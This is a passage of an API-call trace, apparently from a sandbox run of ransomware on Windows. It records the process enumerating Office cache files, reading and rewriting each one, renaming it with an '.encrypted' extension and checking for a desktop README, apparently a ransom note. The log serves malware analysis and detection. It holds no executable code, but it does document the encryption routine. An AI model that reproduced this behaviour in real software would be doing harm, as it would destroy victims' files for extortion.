users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0191.482] GetFileType (hFile=0x2d8) returned 0x1 [0191.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0191.482] GetFileType (hFile=0x2d8) returned 0x1 [0191.482] WriteFile (in: hFile=0x2d8, lpBuffer=0x18551018*, nNumberOfBytesToWrite=0xaf35f0, lpNumberOfBytesWritten=0x2ee784, lpOverlapped=0x0 | out: lpBuffer=0x18551018*, lpNumberOfBytesWritten=0x2ee784*=0xaf35f0, lpOverlapped=0x0) returned 1 [0191.749] CloseHandle (hObject=0x2d8) returned 1 [0192.082] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpFilePart=0x0) returned 0x51 [0192.082] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.encrypted", lpFilePart=0x0) returned 0x5b [0192.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0192.083] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x581b7e40, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xaf35f0)) returned 1 [0192.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0192.083] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.encrypted")) returned 1 [0192.084] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0192.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0192.084] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0192.084] GetFileType (hFile=0x2d8) returned 0x1 [0192.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0192.084] GetFileType (hFile=0x2d8) returned 0x1 [0192.084] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x543 [0192.085] ReadFile (in: hFile=0x2d8, lpBuffer=0x23942d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x23942d0*, lpNumberOfBytesRead=0x2ee794*=0x543, lpOverlapped=0x0) returned 1 [0192.115] CloseHandle (hObject=0x2d8) returned 1 [0192.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0192.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0192.136] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0192.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0192.137] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0192.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0192.137] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0192.138] GetFileType (hFile=0x2d8) returned 0x1 [0192.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0192.138] GetFileType (hFile=0x2d8) returned 0x1 [0192.139] WriteFile (in: hFile=0x2d8, lpBuffer=0x23e3d84*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2ee758, lpOverlapped=0x0 | out: lpBuffer=0x23e3d84*, lpNumberOfBytesWritten=0x2ee758*=0x550, lpOverlapped=0x0) returned 1 [0192.140] CloseHandle (hObject=0x2d8) returned 1 [0192.141] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0192.141] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.encrypted", lpFilePart=0x0) returned 0x5b [0192.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0192.141] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x582503c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x550)) returned 1 [0192.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0192.141] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.encrypted")) returned 1 [0192.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0192.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0192.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpFilePart=0x0) returned 0x48 [0192.143] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f04b0 [0192.144] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.144] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0192.144] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0192.144] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0192.144] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0192.144] FindClose (in: hFindFile=0x94f04b0 | out: hFindFile=0x94f04b0) returned 1 [0192.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0192.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0192.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0192.145] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0192.145] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpFilePart=0x0) returned 0x48 [0192.145] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f04b0 [0192.145] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.145] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0192.145] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0192.146] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0192.146] FindNextFileW (in: hFindFile=0x94f04b0, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0192.146] FindClose (in: hFindFile=0x94f04b0 | out: hFindFile=0x94f04b0) returned 1 [0192.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0192.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0192.146] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpFilePart=0x0) returned 0x51 [0192.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0192.146] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0192.147] GetFileType (hFile=0x2d8) returned 0x1 [0192.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0192.148] GetFileType (hFile=0x2d8) returned 0x1 [0192.148] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0xd02aea [0192.192] ReadFile (in: hFile=0x2d8, lpBuffer=0x1f2f1018, nNumberOfBytesToRead=0xd02aea, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x1f2f1018*, lpNumberOfBytesRead=0x2ee794*=0xd02aea, lpOverlapped=0x0) returned 1 [0192.593] CloseHandle (hObject=0x2d8) returned 1 [0193.651] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0193.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0193.651] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0193.652] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpFilePart=0x0) returned 0x51 [0193.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0193.652] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0193.656] GetFileType (hFile=0x2d8) returned 0x1 [0193.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0193.656] GetFileType (hFile=0x2d8) returned 0x1 [0193.656] WriteFile (in: hFile=0x2d8, lpBuffer=0x25501018*, nNumberOfBytesToWrite=0xd02af0, lpNumberOfBytesWritten=0x2ee784, lpOverlapped=0x0 | out: lpBuffer=0x25501018*, lpNumberOfBytesWritten=0x2ee784*=0xd02af0, lpOverlapped=0x0) returned 1 [0193.993] CloseHandle (hObject=0x2d8) returned 1 [0194.440] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpFilePart=0x0) returned 0x51 [0194.440] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.encrypted", lpFilePart=0x0) returned 0x5b [0194.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0194.440] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x59770700, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xd02af0)) returned 1 [0194.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0194.441] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.encrypted")) returned 1 [0194.443] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0194.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0194.443] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0194.444] GetFileType (hFile=0x2d8) returned 0x1 [0194.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0194.444] GetFileType (hFile=0x2d8) returned 0x1 [0194.444] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x5b1 [0194.444] ReadFile (in: hFile=0x2d8, lpBuffer=0x22531fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x22531fc*, lpNumberOfBytesRead=0x2ee794*=0x5b1, lpOverlapped=0x0) returned 1 [0194.447] CloseHandle (hObject=0x2d8) returned 1 [0194.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0194.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0194.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0194.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0194.474] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All 